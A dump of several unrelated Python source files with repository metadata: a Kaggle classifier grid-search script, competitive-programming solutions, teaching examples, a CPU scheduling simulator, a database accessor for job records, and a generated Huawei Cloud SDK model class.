dt_clf = DecisionTreeClassifier(random_state = 0)
dt_clf.fit(X_train, y_train)
y_pred = dt_clf.predict(X_test)
print(metrics.classification_report(y_test, y_pred))
print("\nAccuracy Score is: " + str(metrics.accuracy_score(y_test, y_pred)))
# --- Grid-search each candidate model with 5-fold CV on all training data ---
# (X_train/X_test are rebound here: full train features and the real test set)
accuracy_scorer = metrics.make_scorer(metrics.accuracy_score)
X_train = pd.get_dummies(train_data.drop('type', axis = 1))
y_train = train_data['type']
X_test = pd.get_dummies(test_data)
params = {'n_estimators':[10, 20, 50, 100], 'criterion':['gini', 'entropy'], 'max_depth':[None, 5, 10, 25, 50]}
rf = RandomForestClassifier(random_state = 0)
clf = GridSearchCV(rf, param_grid = params, scoring = accuracy_scorer, cv = 5, n_jobs = -1)
clf.fit(X_train, y_train)
print('Best score: {}'.format(clf.best_score_))
print('Best parameters: {}'.format(clf.best_params_))
rf_best = RandomForestClassifier(n_estimators = 10, random_state = 0)
params = {'n_estimators':[10, 25, 50, 100], 'max_samples':[1, 3, 5, 10]}
bag = BaggingClassifier(random_state = 0)
clf = GridSearchCV(bag, param_grid = params, scoring = accuracy_scorer, cv = 5, n_jobs = -1)
clf.fit(X_train, y_train)
print('Best score: {}'.format(clf.best_score_))
print('Best parameters: {}'.format(clf.best_params_))
bag_best = BaggingClassifier(max_samples = 5, n_estimators = 25, random_state = 0)
params = {'learning_rate':[0.05, 0.1, 0.5], 'n_estimators':[100, 200, 500], 'max_depth':[2, 3, 5, 10]}
gbc = GradientBoostingClassifier(random_state = 0)
clf = GridSearchCV(gbc, param_grid = params, scoring = accuracy_scorer, cv = 5, n_jobs = -1)
clf.fit(X_train, y_train)
print('Best score: {}'.format(clf.best_score_))
print('Best parameters: {}'.format(clf.best_params_))
gbc_best = GradientBoostingClassifier(learning_rate = 0.1, max_depth = 5, n_estimators = 100, random_state = 0)
params = {'n_neighbors':[3, 5, 10, 20], 'leaf_size':[20, 30, 50], 'p':[1, 2, 5], 'weights':['uniform', 'distance']}
knc = KNeighborsClassifier()
clf = GridSearchCV(knc, param_grid = params, scoring = accuracy_scorer, cv = 5, n_jobs = -1)
clf.fit(X_train, y_train)
print('Best score: {}'.format(clf.best_score_))
print('Best parameters: {}'.format(clf.best_params_))
knc_best = KNeighborsClassifier(n_neighbors = 10)
params = {'penalty':['l1', 'l2'], 'C':[1, 2, 3, 5, 10]}
lr = LogisticRegression(random_state = 0)
clf = GridSearchCV(lr, param_grid = params, scoring = accuracy_scorer, cv = 5, n_jobs = -1)
clf.fit(X_train, y_train)
print('Best score: {}'.format(clf.best_score_))
print('Best parameters: {}'.format(clf.best_params_))
lr_best = LogisticRegression(penalty = 'l1', C = 1, random_state = 0)
params = {'kernel':['linear', 'rbf'], 'C':[1, 3, 5, 10], 'degree':[3, 5, 10]}
svc = SVC(probability = True, random_state = 0)
clf = GridSearchCV(svc, param_grid = params, scoring = accuracy_scorer, cv = 5, n_jobs = -1)
clf.fit(X_train, y_train)
print('Best score: {}'.format(clf.best_score_))
print('Best parameters: {}'.format(clf.best_params_))
svc_best = SVC(C = 10, degree = 3, kernel = 'linear', probability = True, random_state = 0)
# --- Hard-voting ensemble of the tuned models, then the Kaggle submission ---
voting_clf = VotingClassifier(estimators=[('rf', rf_best), ('bag', bag_best), ('gbc', gbc_best), ('lr', lr_best), ('svc', svc_best)]
                              , voting='hard')
voting_clf.fit(X_train, y_train)
y_pred = voting_clf.predict(X_test)
# NOTE(review): this scores the ensemble on the data it was trained on, so it
# reports training-set accuracy, not a held-out estimate.
print("\nAccuracy Score for VotingClassifier is: " + str(voting_clf.score(X_train, y_train)))
submission = pd.DataFrame({'id':test_data_orig['id'], 'type':y_pred})
submission.to_csv('../working/submission.csv', index=False)
| [
"jcamsan@mit.edu"
] | jcamsan@mit.edu |
3c6ef5ab0efd64646da6bb20b1a0a4dbe7ed9d52 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03427/s581758715.py | e0f6f58c743a818c6bcf68751f6112a9ffbc4167 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 157 | py | N = input().strip()
# N (read from stdin on the line above) is kept as a string so that its
# digits can be indexed directly.
k = len(N)
cmax = 0
# Candidate 1: the digit sum of N itself.
for i in range(k):
    cmax += int(N[i])
if k>1:
    # Candidate 2: lower the leading digit by one and fill the remaining
    # k-1 positions with 9s -- the largest digit sum among same-length
    # numbers below N (e.g. 100 -> 099).
    cnt = (int(N[0])-1)+9*(k-1)
    cmax = max(cmax,cnt)
print(cmax)
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
024d7c9d22a9d10759f9603ccacb53f3aac364fd | 0104add04cd6da515e2ccb2c27e44bc6693f9bcf | /Yurii_Khomych/l_1_functions/currying_2.py | c3cd7ebafac18d91b79596981f4c1728f815323c | [] | no_license | YuriiKhomych/ITEA-advanced | c96c3cf9b279caf62fefcd41faf543cee7534626 | 90bc47733c07b5b866aa3a14aa12a169f5df289c | refs/heads/master | 2022-12-09T20:38:23.607426 | 2019-12-22T17:30:59 | 2019-12-22T17:30:59 | 209,354,034 | 0 | 9 | null | 2022-12-08T03:04:04 | 2019-09-18T16:23:12 | Python | UTF-8 | Python | false | false | 854 | py |
def change(func_1, func_2, func_3):
    """Compose three single-argument callables.

    Returns a new callable that feeds its argument through ``func_3``
    first, then ``func_2``, then ``func_1`` (innermost to outermost),
    i.e. it computes ``func_1(func_2(func_3(arg)))``.
    """
    def composed(value):
        # Apply right-to-left, one explicit step at a time.
        step_one = func_3(value)
        step_two = func_2(step_one)
        return func_1(step_two)
    return composed
def kilometer2meter(dist):
    """Convert a distance from kilometers to meters (1 km == 1000 m)."""
    meters_per_kilometer = 1000
    return meters_per_kilometer * dist
def meter2centimeter(dist):
    """Convert a distance from meters to centimeters (1 m == 100 cm)."""
    centimeters_per_meter = 100
    return centimeters_per_meter * dist
def centimeter2feet(dist):
    """Convert a distance from centimeters to feet (1 ft == 30.48 cm)."""
    centimeters_per_foot = 30.48
    return dist / centimeters_per_foot
# Step-by-step conversion of 565 km -> m -> cm -> ft, keeping intermediates.
kilometer2meter_result = kilometer2meter(565)
meter2centimeter_result = meter2centimeter(kilometer2meter_result)
centimeter2feet_result = centimeter2feet(meter2centimeter_result)
# The same conversion as a single nested call.
centimeter2feet_result = centimeter2feet(meter2centimeter(kilometer2meter(565)))
# The same conversion again, this time via the composition helper above.
transform = change(centimeter2feet, meter2centimeter, kilometer2meter)
e = transform(565)
print(e)
# One-liner: compose and immediately apply.
result = change(centimeter2feet, meter2centimeter, kilometer2meter)(565)
| [
"yuriykhomich@gmail.com"
] | yuriykhomich@gmail.com |
f2061a6cc57c32db6bff0cdc2dfda4b0d2a2a292 | 5d027f4d32fc503212a824355ef45295e6df90b5 | /Homework/HW-Scheduler/HW-Scheduler/scheduler.py | 59e134b93c656a04b20b187861469354df0c6331 | [] | no_license | M1c17/OP_three_easy_steps | c99fa0a9214e42e8b44df14e84125c034b9cb1f3 | ea6190c55358d027169e7911bebd7aa6f2b56dff | refs/heads/master | 2022-12-18T22:25:52.055978 | 2020-09-15T03:10:19 | 2020-09-15T03:10:19 | 295,588,135 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,799 | py | #! /usr/bin/env python
import sys
from optparse import OptionParser
import random

# OSTEP-style scheduling simulator: builds a job list (random, or supplied
# with -l) and, when -c is given, traces FIFO/SJF/RR schedules together with
# per-job response, turnaround and wait times.
parser = OptionParser()
parser.add_option("-s", "--seed", default=0, help="the random seed",
                  action="store", type="int", dest="seed")
parser.add_option("-j", "--jobs", default=3, help="number of jobs in the system",
                  action="store", type="int", dest="jobs")
parser.add_option("-l", "--jlist", default="", help="instead of random jobs, provide a comma-separated list of run times",
                  action="store", type="string", dest="jlist")
parser.add_option("-m", "--maxlen", default=10, help="max length of job",
                  action="store", type="int", dest="maxlen")
parser.add_option("-p", "--policy", default="FIFO", help="sched policy to use: SJF, FIFO, RR",
                  action="store", type="string", dest="policy")
parser.add_option("-q", "--quantum", help="length of time slice for RR policy", default=1,
                  action="store", type="int", dest="quantum")
parser.add_option("-c", help="compute answers for me", action="store_true", default=False, dest="solve")
(options, args) = parser.parse_args()

random.seed(options.seed)

# Echo the effective arguments so a run can be reproduced.
print('ARG policy', options.policy)
if options.jlist == '':
    print('ARG jobs', options.jobs)
    print('ARG maxlen', options.maxlen)
    print('ARG seed', options.seed)
else:
    print('ARG jlist', options.jlist)
print('')
print('Here is the job list, with the run time of each job: ')

import operator

# Build the workload: each entry is [job number, run time].  Run times are
# either random in [1, maxlen] or taken verbatim from the -l list.
joblist = []
if options.jlist == '':
    for jobnum in range(0,options.jobs):
        runtime = int(options.maxlen * random.random()) + 1
        joblist.append([jobnum, runtime])
        print('  Job', jobnum, '( length = ' + str(runtime) + ' )')
else:
    jobnum = 0
    for runtime in options.jlist.split(','):
        joblist.append([jobnum, float(runtime)])
        jobnum += 1
    for job in joblist:
        print('  Job', job[0], '( length = ' + str(job[1]) + ' )')
print('\n')

if options.solve == True:
    print('** Solutions **\n')
    # SJF is just FIFO over the jobs sorted by run time, so reuse that path.
    if options.policy == 'SJF':
        joblist = sorted(joblist, key=operator.itemgetter(1))
        options.policy = 'FIFO'
    if options.policy == 'FIFO':
        thetime = 0
        print('Execution trace:')
        for job in joblist:
            print('  [ time %3d ] Run job %d for %.2f secs ( DONE at %.2f )' % (thetime, job[0], job[1], thetime + job[1]))
            thetime += job[1]
        print('\nFinal statistics:')
        t = 0.0
        count = 0
        turnaroundSum = 0.0
        waitSum = 0.0
        responseSum = 0.0
        # Without preemption, response == wait == start time, and
        # turnaround == start time + run time.
        for tmp in joblist:
            jobnum = tmp[0]
            runtime = tmp[1]
            response = t
            turnaround = t + runtime
            wait = t
            print('  Job %3d -- Response: %3.2f  Turnaround %3.2f  Wait %3.2f' % (jobnum, response, turnaround, wait))
            responseSum += response
            turnaroundSum += turnaround
            waitSum += wait
            t += runtime
            count = count + 1
        print('\n  Average -- Response: %3.2f  Turnaround %3.2f  Wait %3.2f\n' % (responseSum/count, turnaroundSum/count, waitSum/count))
    if options.policy == 'RR':
        print('Execution trace:')
        # Per-job bookkeeping, keyed by job number.
        turnaround = {}
        response = {}
        lastran = {}
        wait = {}
        quantum = float(options.quantum)
        jobcount = len(joblist)
        for i in range(0,jobcount):
            lastran[i] = 0.0
            wait[i] = 0.0
            turnaround[i] = 0.0
            response[i] = -1  # -1 marks "has not run yet"
        runlist = []
        for e in joblist:
            runlist.append(e)
        thetime  = 0.0
        # Rotate through the run queue, granting up to one quantum per turn.
        while jobcount > 0:
            # print '%d jobs remaining' % jobcount
            job = runlist.pop(0)
            jobnum = job[0]
            runtime = float(job[1])
            if response[jobnum] == -1:
                response[jobnum] = thetime
            currwait = thetime - lastran[jobnum]
            wait[jobnum] += currwait
            if runtime > quantum:
                # Job is preempted after a full quantum and requeued.
                runtime -= quantum
                ranfor = quantum
                print('  [ time %3d ] Run job %3d for %.2f secs' % (thetime, jobnum, ranfor))
                runlist.append([jobnum, runtime])
            else:
                # Job finishes within this slice.
                ranfor = runtime;
                print('  [ time %3d ] Run job %3d for %.2f secs ( DONE at %.2f )' % (thetime, jobnum, ranfor, thetime + ranfor))
                turnaround[jobnum] = thetime + ranfor
                jobcount -= 1
            thetime += ranfor
            lastran[jobnum] = thetime
        print('\nFinal statistics:')
        turnaroundSum = 0.0
        waitSum = 0.0
        responseSum = 0.0
        for i in range(0,len(joblist)):
            turnaroundSum += turnaround[i]
            responseSum += response[i]
            waitSum += wait[i]
            print('  Job %3d -- Response: %3.2f  Turnaround %3.2f  Wait %3.2f' % (i, response[i], turnaround[i], wait[i]))
        count = len(joblist)
        print('\n  Average -- Response: %3.2f  Turnaround %3.2f  Wait %3.2f\n' % (responseSum/count, turnaroundSum/count, waitSum/count))
    if options.policy != 'FIFO' and options.policy != 'SJF' and options.policy != 'RR':
        print('Error: Policy', options.policy, 'is not available.')
        sys.exit(0)
else:
    # Without -c, just pose the exercise to the reader.
    print('Compute the turnaround time, response time, and wait time for each job.')
    print('When you are done, run this program again, with the same arguments,')
    print('but with -c, which will thus provide you with the answers. You can use')
    print('-s <somenumber> or your own job list (-l 10,15,20 for example)')
    print('to generate different problems for yourself.')
    print('')
| [
"pictor117@gmail.com"
] | pictor117@gmail.com |
f940347b0a46dad50d1d229095586c5651621a8f | 397e125e94f4f139f2bf5055824d81f24b8b1757 | /ABC/138/E.py | 90a94533e38572141fe743f2f69457c94250fa59 | [] | no_license | tails1434/Atcoder | ecbab6ee238e3f225551297db961b1b502841fa4 | e7c7fed36be46bbaaf020a70997842240ba98d62 | refs/heads/master | 2021-07-07T00:31:49.235625 | 2020-09-30T01:42:01 | 2020-09-30T01:42:01 | 189,009,622 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | from collections import defaultdict
from bisect import bisect_right
def main():
    """Greedy subsequence match of T over S repeated indefinitely.

    Reads S and T from stdin; prints the smallest prefix length of the
    infinite repetition S S S ... that contains T as a subsequence, or -1
    if some character of T never occurs in S.
    """
    S = input()
    T = input()
    # 1-based positions of every character within S.
    d = defaultdict(list)
    for i, s in enumerate(S):
        d[s].append(i+1)
    pre = 0
    cnt = 0
    loop = 0
    len_S = len(S)
    for t in T:
        if not d[t]:
            # t never appears in S, so T can never be matched.
            print(-1)
            exit()
        # First occurrence of t strictly after position `pre` in this copy.
        index = bisect_right(d[t],pre)
        if index > len(d[t])-1:
            # No occurrence left in the current copy of S: wrap to the next.
            pre = 0
            loop += 1
            index = bisect_right(d[t],pre)
        pre = d[t][index]
    # Full copies of S consumed plus the offset inside the current copy.
    ans = loop * len_S + pre
    print(ans)
if __name__ == "__main__":
main() | [
"sososo1333@gmail.com"
] | sososo1333@gmail.com |
dbd2baaba12c468d6326baad9fc89420ad6d9071 | 388556baa0c2ee53d8767ae8a4bce18c03124488 | /Chapter11/0017_difference_between_abstraction_encapsulation.py | 0a946d6f97028efc1ea5384b7d8c3e1eb976d848 | [] | no_license | 8563a236e65cede7b14220e65c70ad5718144a3/introduction-python-programming-solutions | 6e2e7c8cf8babc3c63f75d8d5e987f4dbc018269 | f21d70ae2062cc2d5d3a2fefce81a2a3b4ea3bfd | refs/heads/master | 2022-12-10T04:24:56.364629 | 2020-07-01T11:34:01 | 2020-07-01T11:34:01 | 294,878,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 328 | py | """
Program 11.13
Demonstrate the Difference between Abstraction and Encapsulation
"""
class foo:
    """Tiny demo class: hides the addition of two operands behind a method.

    The stored operands remain directly accessible (attributes `a` and `b`),
    which is what the surrounding example contrasts with the `add` abstraction.
    """

    def __init__(self, a, b):
        # Keep both operands as plain public attributes.
        self.a, self.b = a, b

    def add(self):
        """Return the sum of the two stored operands."""
        return self.a + self.b
def main():
    """Demo driver: wrap 3 and 4 in a foo instance and print their sum (7)."""
    total = foo(3, 4).add()
    print(total)


if __name__ == "__main__":
    main()
| [
"warren.jitsing@gmail.com"
] | warren.jitsing@gmail.com |
9af8fb8a7ef155427b16305335e2b3c950d6b53b | 61050d0d7f0c0a60474e4e85d30be4e5ea7c6b04 | /content/components/dom-access/job.odb | 3c76a64ef3a81dd1ef07fb2572060e156f42bdc7 | [] | no_license | danse-inelastic/vnf | 8173f06f32b4a2fa2b71fddfe0fecf9c19e05e9a | be989448577f14f424aca4ce852c7198304ca57b | refs/heads/master | 2021-01-22T01:06:00.294100 | 2015-05-02T23:25:45 | 2015-05-02T23:25:45 | 34,947,878 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,779 | odb | # -*- Python -*-
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Jiao Lin
# California Institute of Technology
# (C) 2006-2009 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
from vnf.components.DOMAccessor import DOMAccessor as base
class Accessor(base):
    """DOM accessor for the 'job' database table.

    Provides single-record lookup, display labels, job-state reset, and
    count/list queries (optionally filtered, labelled, paged and restricted
    to the current user) built with sqlalchemy.
    """

    def __init__(self):
        # The base accessor is parameterised with the table name it serves.
        super(Accessor, self).__init__('job')
        return

    def _getOrm(self):
        """Return the clerk's ORM, after touching the 'computation' accessor
        so its ORM initialisation has run (job records reference computations)."""
        orm = self.director.clerk.orm
        # job depends on computation, let us just reuse orm initialization from computation
        self.director.retrieveDOMAccessor('computation').orm
        return orm
    orm = property(_getOrm)

    def getJobRecord(self, id):
        """Return the job record with the given primary key."""
        # make sure orm is initd
        orm = self.orm
        #
        return self.getRecordByID(JobTable, id)

    def getJobLabel(self, id):
        """Return a human-readable label: 'Job <id>' plus the short
        description in parentheses, when one is set."""
        r = self.getJobRecord(id)
        t = 'Job %s' % id
        if r.short_description:
            t += '(%s)' % r.short_description
        return t

    def resetJob(self, id):
        "reset job to 'initial' status, which allows someone to resubmit the job"
        r = self.getJobRecord(id)
        db = self.db
        # itasks
        # Mark every ITask that lists this job as its beneficiary as failed.
        from vnf.dom.ITask import ITask
        tasks = r.getReferences(db, ITask, 'beneficiary')
        for task in tasks:
            task.state = 'failed'
            db.updateRecord(task)
            continue
        # job itself
        r.state = 'submissionfailed'
        db.updateRecord(r)
        # also reset the computation so that the job retrieval looks like failed
        computation = r.computation.dereference(db)
        domaccess = self.director.retrieveDOMAccessor('computation')
        domaccess.resetResultRetrievalTask(
            type=computation.getTableName(),
            id=computation.id)
        return

    def countJobs(self, filter=None, label=None, mine=False):
        """Return the number of job rows matching filter/label (optionally
        restricted to the current user's rows)."""
        q = self.makeQuery(filter=filter, label=label, mine=mine)
        return q.alias('tocount').count().execute().fetchone()[0]

    def getJobIDs(
        self,
        filter=None, order_by=None, reverse_order=None, slice=None,
        label=None, mine=False,
        ):
        """Return the ids of jobs matching the criteria.

        filter/label select rows (mutually exclusive, see makeQuery);
        order_by sorts; slice is a [start, stop) window. With reverse_order
        the window is mirrored against the total count first so it still
        refers to the same logical page, then the results are reversed.
        """
        db = self.db
        q = self.makeQuery(filter=filter, label=label, mine=mine)
        if order_by:
            q = q.order_by(order_by)
        if slice:
            if reverse_order:
                # Mirror the window: slice [a, b) counted from the end of n rows.
                n = self.countJobs(filter=filter, label=label, mine=mine)
                slice = n-slice[1], n-slice[0]
            q = sqlalchemy.select(
                [q.alias('toslice')],
                limit = slice[1]-slice[0],
                offset = slice[0])
        ret = q.execute().fetchall()
        if reverse_order:
            ret.reverse()
        return [i.id for i in ret]

    def getJobRecords(
        self,
        filter=None, order_by=None, reverse_order=None, slice=None,
        label=None, mine=False,
        ):
        """Like getJobIDs, but map each id to its full record."""
        ids = self.getJobIDs(
            filter=filter, order_by=order_by, reverse_order=reverse_order, slice=slice,
            label=label, mine=mine,
            )
        return map(self.getJobRecord, ids)

    def makeQuery(self, filter=None, label=None, mine=False):
        """Build the base select for job listings.

        `label` and `filter` are mutually exclusive; labelled queries are
        delegated to makeLabeledQuery. Unless `mine`, rows are limited to
        public records or ones owned by the current user.
        """
        if label:
            if filter: raise RuntimeError
            return self.makeLabeledQuery(label, mine=mine)
        db = self.db
        st = db._tablemap.TableToSATable(JobTable)
        cols = [
            st.c.id.label('id'),
            st.c.short_description.label('short_description'),
            st.c.state.label('state'),
            st.c.time_start.label('time_start'),
            st.c.creator,
            st.c.globalpointer,
        ]
        username = self.director.sentry.username
        if mine:
            where = st.c.creator == username
            q = sqlalchemy.select(cols, where)
        else:
            from vnf.utils.query.accesscontrol import select_public_or_owned_records
            q = select_public_or_owned_records(cols, st, username, db)
        if filter:
            # Wrap the access-controlled query and apply the caller's filter.
            q = sqlalchemy.select([q.alias('jobs')], whereclause=filter)
        return q

    def makeLabeledQuery(self, label, mine=False):
        """Build a select joining jobs to the label table via globalpointer.

        Labels in `common_labels` match on name alone; other labels must
        also target the 'job' table.
        NOTE(review): `label` and the username are interpolated into SQL
        strings directly — assumed to be trusted, non-user-controlled input.
        """
        mastertablename = 'job'
        db = self.db
        sL = db._tablemap.TableToSATable(Label)
        if label in common_labels:
            whereclause="labelname='%s'" % (label,)
        else:
            whereclause="labelname='%s' and targettable='%s'" % (
                label, mastertablename)
        labelq = sqlalchemy.select(
            [sL.c.entity.label('entity'),
             sL.c.labelname.label('label'),
             ],
            whereclause=whereclause,
            ).alias('labelq')
        st = db._tablemap.TableToSATable(JobTable)
        cols = [
            st.c.id.label('id'),
            st.c.short_description.label('short_description'),
            st.c.state.label('state'),
            st.c.time_start.label('time_start'),
            labelq.c.entity.label('gptr'),
        ]
        # where = st.c.globalpointer==labelq.c.entity
        where = 'globalpointer=labelq.entity'
        if mine:
            username = self.director.sentry.username
            mine = "creator='%s'" % username
            where = '%s and %s' % (where, mine)
        q = sqlalchemy.select(cols, whereclause = where)
        return q
from vnf.dom.Label import Label, common_labels
from vnf.dom.Job import Job as JobTable
from dsaw.db.VersatileReference import global_pointer
import sqlalchemy
def accessor():
    """Factory entry point used by the framework to obtain the job accessor."""
    return Accessor()

# version
__id__ = "$Id$"
# End of file
| [
"linjiao@caltech.edu"
] | linjiao@caltech.edu |
8885c933ea131e903feb51fe6f4dbc4537a88af7 | a2d36e471988e0fae32e9a9d559204ebb065ab7f | /huaweicloud-sdk-meeting/huaweicloudsdkmeeting/v1/model/qos_send_receive_info.py | 7b4a4548e2c3a10bc21c875febcbe1d7b61af84f | [
"Apache-2.0"
] | permissive | zhouxy666/huaweicloud-sdk-python-v3 | 4d878a90b8e003875fc803a61414788e5e4c2c34 | cc6f10a53205be4cb111d3ecfef8135ea804fa15 | refs/heads/master | 2023-09-02T07:41:12.605394 | 2021-11-12T03:20:11 | 2021-11-12T03:20:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,634 | py | # coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class QosSendReceiveInfo:
    """Generated SDK model holding QoS metric series (bitrate, latency,
    jitter, packet loss, resolution, frame rate) for one media stream
    direction.

    Attributes:
        openapi_types (dict): The key is attribute name
                            and the value is attribute type.

        attribute_map (dict): The key is attribute name
                            and the value is json key in definition.
    """

    # Attributes whose values are masked ("****") in to_dict(); none here.
    sensitive_list = []

    openapi_types = {
        'bitrate': 'list[QosDataNoThrElement]',
        'latency': 'list[QosDataElement]',
        'jitter': 'list[QosDataElement]',
        'packet_loss_max': 'list[QosDataElement]',
        'resolution': 'list[QosDataNoThrElement]',
        'frame': 'list[QosDataNoThrElement]'
    }

    attribute_map = {
        'bitrate': 'bitrate',
        'latency': 'latency',
        'jitter': 'jitter',
        'packet_loss_max': 'packet_loss_max',
        'resolution': 'resolution',
        'frame': 'frame'
    }

    def __init__(self, bitrate=None, latency=None, jitter=None, packet_loss_max=None, resolution=None, frame=None):
        """QosSendReceiveInfo - a model defined in huaweicloud sdk"""

        self._bitrate = None
        self._latency = None
        self._jitter = None
        self._packet_loss_max = None
        self._resolution = None
        self._frame = None
        self.discriminator = None

        # Only assign attributes that were actually supplied, so unset
        # fields stay None and can be distinguished from empty lists.
        if bitrate is not None:
            self.bitrate = bitrate
        if latency is not None:
            self.latency = latency
        if jitter is not None:
            self.jitter = jitter
        if packet_loss_max is not None:
            self.packet_loss_max = packet_loss_max
        if resolution is not None:
            self.resolution = resolution
        if frame is not None:
            self.frame = frame

    @property
    def bitrate(self):
        """Gets the bitrate of this QosSendReceiveInfo.

        Bit rate in kbps; carries no threshold alarms. Valid when qosType = audio/video/screen.

        :return: The bitrate of this QosSendReceiveInfo.
        :rtype: list[QosDataNoThrElement]
        """
        return self._bitrate

    @bitrate.setter
    def bitrate(self, bitrate):
        """Sets the bitrate of this QosSendReceiveInfo.

        Bit rate in kbps; carries no threshold alarms. Valid when qosType = audio/video/screen.

        :param bitrate: The bitrate of this QosSendReceiveInfo.
        :type: list[QosDataNoThrElement]
        """
        self._bitrate = bitrate

    @property
    def latency(self):
        """Gets the latency of this QosSendReceiveInfo.

        Latency in milliseconds; includes threshold alarms. Valid when qosType = audio/video/screen.

        :return: The latency of this QosSendReceiveInfo.
        :rtype: list[QosDataElement]
        """
        return self._latency

    @latency.setter
    def latency(self, latency):
        """Sets the latency of this QosSendReceiveInfo.

        Latency in milliseconds; includes threshold alarms. Valid when qosType = audio/video/screen.

        :param latency: The latency of this QosSendReceiveInfo.
        :type: list[QosDataElement]
        """
        self._latency = latency

    @property
    def jitter(self):
        """Gets the jitter of this QosSendReceiveInfo.

        Jitter in milliseconds; includes threshold alarms. Valid when qosType = audio/video/screen.

        :return: The jitter of this QosSendReceiveInfo.
        :rtype: list[QosDataElement]
        """
        return self._jitter

    @jitter.setter
    def jitter(self, jitter):
        """Sets the jitter of this QosSendReceiveInfo.

        Jitter in milliseconds; includes threshold alarms. Valid when qosType = audio/video/screen.

        :param jitter: The jitter of this QosSendReceiveInfo.
        :type: list[QosDataElement]
        """
        self._jitter = jitter

    @property
    def packet_loss_max(self):
        """Gets the packet_loss_max of this QosSendReceiveInfo.

        Maximum packet-loss rate as a percentage; includes threshold alarms. Valid when qosType = audio/video/screen.

        :return: The packet_loss_max of this QosSendReceiveInfo.
        :rtype: list[QosDataElement]
        """
        return self._packet_loss_max

    @packet_loss_max.setter
    def packet_loss_max(self, packet_loss_max):
        """Sets the packet_loss_max of this QosSendReceiveInfo.

        Maximum packet-loss rate as a percentage; includes threshold alarms. Valid when qosType = audio/video/screen.

        :param packet_loss_max: The packet_loss_max of this QosSendReceiveInfo.
        :type: list[QosDataElement]
        """
        self._packet_loss_max = packet_loss_max

    @property
    def resolution(self):
        """Gets the resolution of this QosSendReceiveInfo.

        Video resolution; carries no threshold alarms. Valid when qosType = video/screen.

        :return: The resolution of this QosSendReceiveInfo.
        :rtype: list[QosDataNoThrElement]
        """
        return self._resolution

    @resolution.setter
    def resolution(self, resolution):
        """Sets the resolution of this QosSendReceiveInfo.

        Video resolution; carries no threshold alarms. Valid when qosType = video/screen.

        :param resolution: The resolution of this QosSendReceiveInfo.
        :type: list[QosDataNoThrElement]
        """
        self._resolution = resolution

    @property
    def frame(self):
        """Gets the frame of this QosSendReceiveInfo.

        Frame rate in fps; carries no threshold alarms. Valid when qosType = video/screen.

        :return: The frame of this QosSendReceiveInfo.
        :rtype: list[QosDataNoThrElement]
        """
        return self._frame

    @frame.setter
    def frame(self, frame):
        """Sets the frame of this QosSendReceiveInfo.

        Frame rate in fps; carries no threshold alarms. Valid when qosType = video/screen.

        :param frame: The frame of this QosSendReceiveInfo.
        :type: list[QosDataNoThrElement]
        """
        self._frame = frame

    def to_dict(self):
        """Returns the model properties as a dict"""
        result = {}

        for attr, _ in six.iteritems(self.openapi_types):
            value = getattr(self, attr)
            if isinstance(value, list):
                # Recursively serialise model elements contained in lists.
                result[attr] = list(map(
                    lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                    value
                ))
            elif hasattr(value, "to_dict"):
                result[attr] = value.to_dict()
            elif isinstance(value, dict):
                # Recursively serialise model values contained in dicts.
                result[attr] = dict(map(
                    lambda item: (item[0], item[1].to_dict())
                    if hasattr(item[1], "to_dict") else item,
                    value.items()
                ))
            else:
                if attr in self.sensitive_list:
                    # Mask attributes flagged as sensitive.
                    result[attr] = "****"
                else:
                    result[attr] = value

        return result

    def to_str(self):
        """Returns the string representation of the model"""
        import simplejson as json
        if six.PY2:
            # Python 2 only: force a UTF-8 default encoding so the JSON dump
            # of non-ASCII text does not raise (generated-code idiom).
            import sys
            reload(sys)
            sys.setdefaultencoding("utf-8")

        return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)

    def __repr__(self):
        """For `print`"""
        return self.to_str()

    def __eq__(self, other):
        """Returns true if both objects are equal"""
        if not isinstance(other, QosSendReceiveInfo):
            return False

        return self.__dict__ == other.__dict__

    def __ne__(self, other):
        """Returns true if both objects are not equal"""
        return not self == other
| [
"hwcloudsdk@huawei.com"
] | hwcloudsdk@huawei.com |
db126458e075c35c3a9606d6dc1f54e18b85536e | d4442db5a7ab9db2b04fef640a9864f3fba54758 | /src/python/WMCore/RequestManager/RequestDB/Oracle/Group/GetGroupFromAssoc.py | 3549961c0b5eea9816bb43e00f98608494e976f0 | [] | no_license | stuartw/WMCore | fa25ff19ab5058a635d35d3c58a0ac56a3e079a1 | 38c39c43f7237fd316930839674ac9be3c0ee8cc | refs/heads/master | 2021-01-18T07:18:18.324604 | 2012-10-18T22:30:34 | 2012-10-18T22:30:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 180 | py | from WMCore.RequestManager.RequestDB.MySQL.Group.GetGroupFromAssoc import GetGroupFromAssoc as GetGroupFromAssocMySQL
class GetGroupFromAssoc(GetGroupFromAssocMySQL):
    """Oracle variant of GetGroupFromAssoc.

    No overrides: the MySQL implementation is inherited unchanged.
    """
    pass
"metson@4525493e-7705-40b1-a816-d608a930855b"
] | metson@4525493e-7705-40b1-a816-d608a930855b |
dfcf388075f9499cfdaf3e385b9bec1af4308eb3 | 3aef4825c5f2366f2e551cdfa54b88c034b0b4f4 | /tutorials/2_tensorflow_old/matplotlibTUT/plt14_3d.py | d742a0cd4768afe2bb32c874c3cc31368aaf5fd1 | [
"MIT"
